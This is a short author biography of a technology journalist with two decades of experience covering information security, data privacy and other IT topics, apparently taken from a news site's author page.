Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#ssl